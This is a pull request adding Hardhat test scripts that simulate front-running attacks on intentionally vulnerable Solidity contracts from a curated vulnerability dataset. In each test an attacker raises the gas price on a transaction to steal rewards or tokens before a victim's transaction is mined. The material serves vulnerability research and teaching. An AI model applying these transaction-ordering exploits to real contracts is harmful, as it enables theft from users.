### PR TITLE
Add tests simulating sb-curated front running attacks

### DIFF
--- a/smartbugs-curated/0.4.x/contracts/dataset/front_running/FindThisHash.sol
+++ b/smartbugs-curated/0.4.x/contracts/dataset/front_running/FindThisHash.sol
@@ -7,7 +7,7 @@
 pragma solidity ^0.4.22;
 
 contract FindThisHash {
-    bytes32 constant public hash = 0xb5b5b97fafd9855eec9b41f74dfb6c38f5951141f9a3ecd7f44d5479b630ee0a;
+    bytes32 constant public hash = 0x3ea2f1d0abf3fc66cf29eebb70cbd4e7fe762ef8a09bcc06c8edf641230afec0;
 
     constructor() public payable {} // load with ether
 

--- a/smartbugs-curated/0.4.x/hardhat.config.js
+++ b/smartbugs-curated/0.4.x/hardhat.config.js
@@ -17,12 +17,6 @@ module.exports = {
   networks: {
     hardhat: {
       hardfork: "shanghai",
-      gas: "auto",
-      mining: {
-        mempool: {
-          order: "fifo"
-        }
-      }
     }
   }
 };

--- a/smartbugs-curated/0.4.x/test/denial_of_service/dos_simple_test.js
+++ b/smartbugs-curated/0.4.x/test/denial_of_service/dos_simple_test.js
@@ -27,7 +27,7 @@ describe('attack denial_of_service/dos_simple.sol', function () {
         const tx2 = await victim.ifillArray();
 
         await network.provider.send("evm_mine");
-
+        await network.provider.send("evm_setAutomine", [true]);
 
         const receipt1 = await (await tx1).wait();
         expect(receipt1.status).to.equal(1); // Ensure tx1 was successful

--- a/smartbugs-curated/0.4.x/test/front_running/ERC20_test.js
+++ b/smartbugs-curated/0.4.x/test/front_running/ERC20_test.js
@@ -1,0 +1,42 @@
+const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers');
+const { expect } = require('chai');
+
+describe('attack front_running/ERC20.sol', function () {
+    let owner, attacker;
+    async function deployContracts() {
+      [owner, attacker] = await ethers.getSigners();
+      const ERC20 = await ethers.getContractFactory('contracts/dataset/front_running/ERC20.sol:ERC20');
+      const victim = await ERC20.connect(owner).deploy(100);  
+      return {victim};
+    }
+
+
+    it('front running vulnerability', async function () {
+      const {victim} = await loadFixture(deployContracts);
+
+    // owner mistakenly approves the attacker to spend 100 tokens
+      await victim.connect(owner).approve(attacker.address, 100);
+      const ownerInitialBalance = await victim.balanceOf(owner.address);
+      expect(ownerInitialBalance).to.be.equal(100);
+
+      await network.provider.send("evm_setAutomine", [false]);
+      await network.provider.send("evm_setIntervalMining", [0]);
+
+      // owner tries to restify the allowance
+      const tx1 = await victim.connect(owner).approve(attacker.address, 10, {gasPrice: 767532034});
+
+      // attacker sees tx1's gasPrice and increases its tx gasPrice to become retrieve the tokens before tx1 is mined
+      const tx2 = await victim.connect(attacker).transferFrom(owner.address, attacker.address, 100, {gasPrice: 767532040});
+
+      await network.provider.send("hardhat_mine", ["0x2"]);
+      await network.provider.send("evm_setAutomine", [true]);
+
+      const ownerBalance = await victim.balanceOf(owner.address);
+      expect(ownerBalance).to.be.equal(0);
+
+      const attackerBalance = await victim.balanceOf(attacker.address);
+      expect(attackerBalance).to.be.equal(100);
+    });
+
+
+  });

--- a/smartbugs-curated/0.4.x/test/front_running/FindThisHash.js
+++ b/smartbugs-curated/0.4.x/test/front_running/FindThisHash.js
@@ -1,0 +1,51 @@
+const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers');
+const { expect } = require('chai');
+
+describe('attack front_running/FindThisHash.sol', function () {
+    let owner;
+    let user;
+    let attacker;
+    async function deployContracts() {
+      const [s1, s2, s3] = await ethers.getSigners();
+      owner = s1;
+      user = s2;
+      attacker = s3;
+      const FindThisHash = await ethers.getContractFactory('contracts/dataset/front_running/FindThisHash.sol:FindThisHash');
+      const victim = await FindThisHash.connect(owner).deploy({value: ethers.parseEther("1000")});  
+      return {victim};
+    }
+
+
+    it('front running control vulnerability', async function () {
+      const {victim} = await loadFixture(deployContracts);
+
+      const attackerBalanceBefore = await ethers.provider.getBalance(attacker.address);
+      
+      const initialBalance = await ethers.provider.getBalance(victim.target);
+      expect(initialBalance).to.be.equal(ethers.parseEther("1000"));
+
+      await network.provider.send("evm_setAutomine", [false]);
+      await network.provider.send("evm_setIntervalMining", [0]);
+      const solution = "Hello World!"
+      const tx1 = await victim.connect(user).solve(solution, {gasPrice: 767532034});
+
+      // attacker sees tx1 and wants to claim the reward before it's reset
+      const tx2 = await victim.connect(attacker).solve(solution, {gasPrice: 767532040});
+
+      await network.provider.send("evm_mine");
+      await network.provider.send("evm_mine");
+      await network.provider.send("evm_setAutomine", [true]);
+
+      // owner's tx1 will be reverted since the attacker's tx2 was mined first
+      expect(tx1).to.be.reverted;
+      const receipt2 = await tx2.wait();
+      const gasUsed = receipt2.gasUsed * BigInt(767532040);
+      const balanceAfter = await ethers.provider.getBalance(victim.target);
+      expect(balanceAfter).to.be.equal(0);
+
+      const attackerBalance = await ethers.provider.getBalance(attacker.address);
+      expect(attackerBalance).to.be.equal(attackerBalanceBefore + ethers.parseEther("1000") - gasUsed);
+    });
+
+
+  });

--- a/smartbugs-curated/0.4.x/test/front_running/FindThisHash_test.js
+++ b/smartbugs-curated/0.4.x/test/front_running/FindThisHash_test.js
@@ -2,21 +2,16 @@ const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers');
 const { expect } = require('chai');
 
 describe('attack front_running/FindThisHash.sol', function () {
-    let owner;
-    let user;
-    let attacker;
+    let owner, user, attacker;
     async function deployContracts() {
-      const [s1, s2, s3] = await ethers.getSigners();
-      owner = s1;
-      user = s2;
-      attacker = s3;
+      [owner, user, attacker] = await ethers.getSigners();
       const FindThisHash = await ethers.getContractFactory('contracts/dataset/front_running/FindThisHash.sol:FindThisHash');
       const victim = await FindThisHash.connect(owner).deploy({value: ethers.parseEther("1000")});  
       return {victim};
     }
 
 
-    it('front running control vulnerability', async function () {
+    it('front running vulnerability', async function () {
       const {victim} = await loadFixture(deployContracts);
 
       const attackerBalanceBefore = await ethers.provider.getBalance(attacker.address);
@@ -32,8 +27,7 @@ describe('attack front_running/FindThisHash.sol', function () {
       // attacker sees tx1 and wants to claim the reward before it's reset
       const tx2 = await victim.connect(attacker).solve(solution, {gasPrice: 767532040});
 
-      await network.provider.send("evm_mine");
-      await network.provider.send("evm_mine");
+      await network.provider.send("hardhat_mine", ["0x2"]);
       await network.provider.send("evm_setAutomine", [true]);
 
       // owner's tx1 will be reverted since the attacker's tx2 was mined first

--- a/smartbugs-curated/0.4.x/test/front_running/eth_tx_order_dependence_minimal_test.js
+++ b/smartbugs-curated/0.4.x/test/front_running/eth_tx_order_dependence_minimal_test.js
@@ -11,7 +11,7 @@ describe('attack front_running/eth_tx_order_dependence_minimal.sol', function ()
     }
 
 
-    it('front running control vulnerability in setReward() function', async function () {
+    it('front running vulnerability in setReward() function', async function () {
       const {victim} = await loadFixture(deployContracts);
 
       const attackerBalanceBefore = await ethers.provider.getBalance(attacker.address);
@@ -49,7 +49,7 @@ describe('attack front_running/eth_tx_order_dependence_minimal.sol', function ()
     });
 
 
-    it('front running control vulnerability in claimReward() function', async function () {
+    it('front running vulnerability in claimReward() function', async function () {
         const {victim} = await loadFixture(deployContracts);
   
         const attackerBalanceBefore = await ethers.provider.getBalance(attacker.address);

--- a/smartbugs-curated/0.4.x/test/front_running/eth_tx_order_dependence_minimal_test.js
+++ b/smartbugs-curated/0.4.x/test/front_running/eth_tx_order_dependence_minimal_test.js
@@ -1,0 +1,98 @@
+const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers');
+const { expect } = require('chai');
+
+describe('attack front_running/eth_tx_order_dependence_minimal.sol', function () {
+    let owner;
+    let user;
+    let attacker;
+    let snapshotId;
+    async function deployContracts() {
+      const [s1, s2, s3] = await ethers.getSigners();
+      owner = s1;
+      user = s2;
+      attacker = s3;
+      const EthTxOrderDependenceMinimal = await ethers.getContractFactory('contracts/dataset/front_running/eth_tx_order_dependence_minimal.sol:EthTxOrderDependenceMinimal');
+      const victim = await EthTxOrderDependenceMinimal.connect(owner).deploy();  
+      return {victim};
+    }
+
+
+    it('front running control vulnerability in setReward() function', async function () {
+      const {victim} = await loadFixture(deployContracts);
+
+      const attackerBalanceBefore = await ethers.provider.getBalance(attacker.address);
+      
+      expect(await victim.owner()).to.be.equal(owner.address);
+
+      const initialBalance = await ethers.provider.getBalance(victim.target);
+      expect(initialBalance).to.be.equal(0);
+
+
+      await victim.connect(owner).setReward({value: 2});
+      const balanceReward = await ethers.provider.getBalance(victim.target);
+      expect(balanceReward).to.be.equal(2);
+
+      await network.provider.send("evm_setAutomine", [false]);
+      await network.provider.send("evm_setIntervalMining", [0]);
+      //owner wants to rectify the reward
+      const tx1 = await victim.connect(owner).setReward({value: 1, gasPrice: 767532034});
+
+      // attacker sees tx1 and wants to claim the reward before it's reset
+      const tx2 = await victim.connect(attacker).claimReward(1, {gasPrice: 767533000});
+
+      await network.provider.send("evm_mine");
+      await network.provider.send("evm_setAutomine", [true]);
+
+      // owner's tx1 will be reverted since the attacker's tx2 was mined first
+      expect(tx1).to.be.reverted;
+      const receipt2 = await (await tx2).wait();
+      const gasUsed = receipt2.gasUsed * BigInt(767533000);
+      const balanceAfter = await ethers.provider.getBalance(victim.target);
+      expect(balanceAfter).to.be.equal(0);
+
+      const attackerBalance = await ethers.provider.getBalance(attacker.address);
+      expect(attackerBalance).to.be.equal(attackerBalanceBefore + balanceReward - gasUsed);
+    });
+
+
+    it('front running control vulnerability in claimReward() function', async function () {
+        const {victim} = await loadFixture(deployContracts);
+  
+        const attackerBalanceBefore = await ethers.provider.getBalance(attacker.address);
+        
+        expect(await victim.owner()).to.be.equal(owner.address);
+  
+        const initialBalance = await ethers.provider.getBalance(victim.target);
+        expect(initialBalance).to.be.equal(0);
+  
+  
+        await victim.connect(owner).setReward({value: 2});
+        const balanceReward = await ethers.provider.getBalance(victim.target);
+        expect(balanceReward).to.be.equal(2);
+  
+        await network.provider.send("evm_setAutomine", [false]);
+        await network.provider.send("evm_setIntervalMining", [0]);
+        //user knows that claimming reward with value 1 will be successfull
+        const tx1 = await victim.connect(user).claimReward(1, {gasPrice: 767532034});
+  
+        // attacker sees tx1 with value 1 and wants to claim the reward before user
+        const tx2 = await victim.connect(attacker).claimReward(1, {gasPrice: 767533000});
+  
+        await network.provider.send("evm_mine");
+
+        await network.provider.send("evm_setAutomine", [true]);
+  
+        // owner's tx1 will be reverted since the attacker's tx2 was mined first
+        expect(tx1).to.be.reverted;
+        const receipt2 = await (await tx2).wait();
+        const gasUsed = receipt2.gasUsed * BigInt(767533000);
+        const balanceAfter = await ethers.provider.getBalance(victim.target);
+        expect(balanceAfter).to.be.equal(0);
+  
+        const attackerBalance = await ethers.provider.getBalance(attacker.address);
+        expect(attackerBalance).to.be.equal(attackerBalanceBefore + balanceReward - gasUsed);
+  
+      });
+
+
+  });

--- a/smartbugs-curated/0.4.x/test/front_running/eth_tx_order_dependence_minimal_test.js
+++ b/smartbugs-curated/0.4.x/test/front_running/eth_tx_order_dependence_minimal_test.js
@@ -2,15 +2,9 @@ const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers');
 const { expect } = require('chai');
 
 describe('attack front_running/eth_tx_order_dependence_minimal.sol', function () {
-    let owner;
-    let user;
-    let attacker;
-    let snapshotId;
+    let owner, user , attacker;
     async function deployContracts() {
-      const [s1, s2, s3] = await ethers.getSigners();
-      owner = s1;
-      user = s2;
-      attacker = s3;
+      [owner, user, attacker] = await ethers.getSigners();
       const EthTxOrderDependenceMinimal = await ethers.getContractFactory('contracts/dataset/front_running/eth_tx_order_dependence_minimal.sol:EthTxOrderDependenceMinimal');
       const victim = await EthTxOrderDependenceMinimal.connect(owner).deploy();  
       return {victim};

--- a/smartbugs-curated/0.4.x/test/front_running/odds_and_evens_test.js
+++ b/smartbugs-curated/0.4.x/test/front_running/odds_and_evens_test.js
@@ -1,0 +1,50 @@
+const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers');
+const { expect } = require('chai');
+
+describe('attack front_running/odds_and_evens.sol', function () {
+    let owner, user, attacker;
+    async function deployContracts() {
+      [owner, user, attacker] = await ethers.getSigners();
+      const OddsAndEvens = await ethers.getContractFactory('contracts/dataset/front_running/odds_and_evens.sol:OddsAndEvens');
+      const victim = await OddsAndEvens.connect(owner).deploy();  
+      return {victim};
+    }
+
+
+    it('front running vulnerability', async function () {
+      const {victim} = await loadFixture(deployContracts);
+
+      const amount = ethers.parseEther("1");
+
+      const attackerBalanceBefore = await ethers.provider.getBalance(attacker.address);
+      const userBalanceBefore = await ethers.provider.getBalance(user.address);
+      
+      const initialBalance = await ethers.provider.getBalance(victim.target);
+      expect(initialBalance).to.be.equal(0);
+
+      await network.provider.send("evm_setAutomine", [false]);
+      await network.provider.send("evm_setIntervalMining", [0]);
+      const tx1 = await victim.connect(user).play(0, {value: amount, gasPrice: 767532034});
+
+      // attacker sees tx2 and sets the value and gasPrice to become the winner
+      const tx2 = await victim.connect(attacker).play(1, {value: amount, gasPrice: 767532033});
+
+      await network.provider.send("hardhat_mine", ["0x3"]);
+      await network.provider.send("evm_setAutomine", [true]);
+
+      const receipt1 = await tx1.wait();
+      const gasUsed1 = receipt1.gasUsed * receipt1.gasPrice;
+      const receipt2 = await tx2.wait();
+      const gasUsed2 = receipt2.gasUsed * receipt2.gasPrice;
+      const balanceAfter = await ethers.provider.getBalance(victim.target);
+      expect(balanceAfter).to.be.equal(amount * BigInt(2) - ethers.parseEther("1.8"));
+
+      const userBalanceAfter = await ethers.provider.getBalance(user.address);
+      expect(userBalanceAfter).to.be.equal(userBalanceBefore - amount - gasUsed1);
+
+      const attackerBalance = await ethers.provider.getBalance(attacker.address);
+      expect(attackerBalance).to.be.equal(attackerBalanceBefore - amount - gasUsed2 + ethers.parseEther("1.8"));
+    });
+
+
+  });


### PR DESCRIPTION
### Description
This pull request addresses issue #16 by adding tests that simulate attacks exploiting the front running vulnerabilities in the [`smartbugs-curated` repository](https://github.com/ASSERT-KTH/smartbugs-curated).

### Changes Made
- Edited denial of service tests to be idempotent.
- Added test cases targeting arithmetic vulnerabilities such as front running.

### Testing Instructions
1. Run the test suite using the provided instructions in the `solidity-hack-labs/smartbugs-curated/0.4.x/README.md`.
2. Verify that the new tests execute successfully and exploit the vulnerabilities.

### Linked Issues
Closes #16 